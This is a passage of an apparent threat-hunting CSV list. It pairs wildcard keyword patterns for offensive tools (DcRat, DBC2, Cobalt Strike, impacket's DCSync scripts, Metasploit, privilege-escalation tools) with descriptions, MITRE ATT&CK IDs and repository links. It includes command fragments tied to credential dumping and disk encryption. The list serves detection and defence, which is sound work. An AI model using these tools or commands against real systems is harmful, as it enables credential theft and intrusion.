workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.exe*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.sln*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp-master*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*dazzleUP.cna*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.sln*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.vcxproj*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.x32.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.x64.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP_Reflective_DLL*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP-master*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*db2_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*db2_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DBC2.git*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2_agent.cs*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2_agent.exe*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2Loader.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2Loader.exe*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2Loader.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2LoaderWrapperCLR.*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2LoaderWrapperCLR_x64.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2LoaderWrapperCLR_x86.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*DBC2-master.zip*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*dbdbnchagbkhknegmhgikkleoogjcfge*","greyware_tool_keyword","Hideman VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dbGetNimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*dccon.exe -encrypt2*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*dchrastil*","offensive_tool_keyword","Github Username","github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dchrastil","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--dc-ip *--check-user-access*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*dcipher-cli*","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","3","224","30","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z" +"*dcomexec -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dcomexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcomhijack.cna*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack.py*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack-main*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*DCOMPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*DCOMPotato-master*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*DCOMReflection.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*DcRat 1.0.7*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.7z*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat_png.png*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat-main.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*dcrypt_bartpe.zip*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcrypt_install.iss*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcrypt_setup_*.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcrypt_winpe.zip*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcsync -Domain*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*dcsync.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*dcsync.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*dcsync@protonmail.com*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*dcsync_inject*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*dcsyncattack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcsyncclient.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - 